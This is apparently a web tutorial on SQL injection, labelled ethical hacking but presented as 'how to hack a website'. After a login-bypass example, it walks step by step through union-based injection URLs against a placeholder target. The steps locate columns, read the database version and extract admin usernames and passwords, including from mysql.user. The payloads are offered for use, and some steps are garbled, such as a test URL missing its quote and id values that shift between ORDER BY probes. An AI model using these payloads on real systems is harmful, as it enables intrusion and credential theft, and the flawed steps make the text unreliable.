Ethical Hacking - SQL Injection

SQL Injection

SQL injection is an attack where the hacker makes use of unvalidated user input to enter arbitrary data or SQL commands; malicious queries are constructed and when executed by the backend database it results in unwanted results. The attacker should have the knowledge of background database and he must make use of different strings to construct malicious queries to post them to the target.

SQL Injection

For Example, in user login screen, username and password are the dynamic fields where users enter the data. Depending upon the user’s inputs dynamic queries will be constructed; the usual query will be

SQL Injection Query

User id password query

Select * from users table where username=’Username.txt’ and password=’Password.txt’

If the input fields are not sanitized properly, then the malicious user can enter some data like this

Username = blah’ or 1=1—
Password = password

Here both username and password are incorrect. But the query which is constructed will be

Select * from users where username=’blah’ or 1=1—and password=’password’

The query will run and the user will be granted access. This is because the first part of the query is

Select * from users where username=’blah’ or 1=1

Because – is a comment line in SQL, everything following that will be ignored. The query will only validate between username=’blah’ or 1=1.

Because 1=1 is always true, the user will be granted access.

How to hack a website through SQL injection

SQL is the Structured Query Language used for the databases. In this attack, attacker figures out errors of SQL through browser and after finding a error, he hits that error to exploit attack. These errors are basically known as vulnerabilities. So, attacker finds out vulnerability in a website and exploit to perform different actions.

1. FINDING OUT THE VULNERABILITY

Let’s say we have a site like this,

http://www.target.com/page.php?id=1

Now to test it, we need to add single quote mark at the end of the URL and hit enter like below.

http://www.target.com/page.php?id=1

If we find an SQL error on the page as “You have an error in SQL syntax. Check manual of your MySQL server version.” It may be a little different, but it’ll be SQL relevant error showing that it have some sort of SQL issue. It means, our target is vulnerable to SQL injection.

Havij

2. FINDING OUT THE COLUMNS

In order to find out columns, we simply need to use Order by statement. It tells the database to order the results. Let’s see how to do it.

http://www.target.com/page.php?id=1 order by 1– (We found no error here, so we’ll change this 1 with 2 now.)

http://www.target.com/page.php?id=2 order by 2– (Still no error)

http://www.target.com/page.php?id=3 order by 3– (Found error like column 3 unknown.)

This means, it have 2 number of columns.

3. CHECK FOR UNION AND MYSQL VERSION

With union function, we can select multiple database columns. How it looks like,

http://www.target.com/page.php?id=1 union all select 1,2– ( as we already have found the number of columns are 2.)

If we see some numbers over screen like 1 or 2. Let’s say it shows number 2 on screen. We need to replace the number of column that appeared on screen with @@version

http://www.target.com/page.php?id=1 union all select 1,@@version–

If we get error of union + illegal mix of collations, we need to hex and unhex functions.

http://www.target.com/page.php?id=1 union all select 1,unhex(hex(@@version))–

It’ll show MySQL version name like 4.1.2 etc. Now we need to find out the table names.

4. CHECK FOR TABLE NAMES AND COLUMN NAMES

We need to find out the table name by a little guessing like user, member and admin.

http://www.target.com/page.php?id=1 union all select 1,2 from admin–

http://www.target.com/page.php?id=1 union all select 1,username from admin– (if column name username doesn’t work, try any other like user, member etc).

Username displayed on screen. Now we need to check for the password column.

http://www.target.com/page.php?id=1 union all select 1,concat(username,0x3a,password) from admin–

Now we get username and password displayed on the screen as admin:admin or admin:password or anything like that.

If you can’t figure out the table name, you can use default command of MySQL.

http://www.target.com/page.php?id=1 union all select 1,concat(username,0x3a,password) from mysql.user–

CHECK FOR TABLE NAMES AND COLUMN NAMES

That’s all for now, hope you got how to hack a website through SQL injection. If you encounter any problem, feel free to comment below. Cheers..:)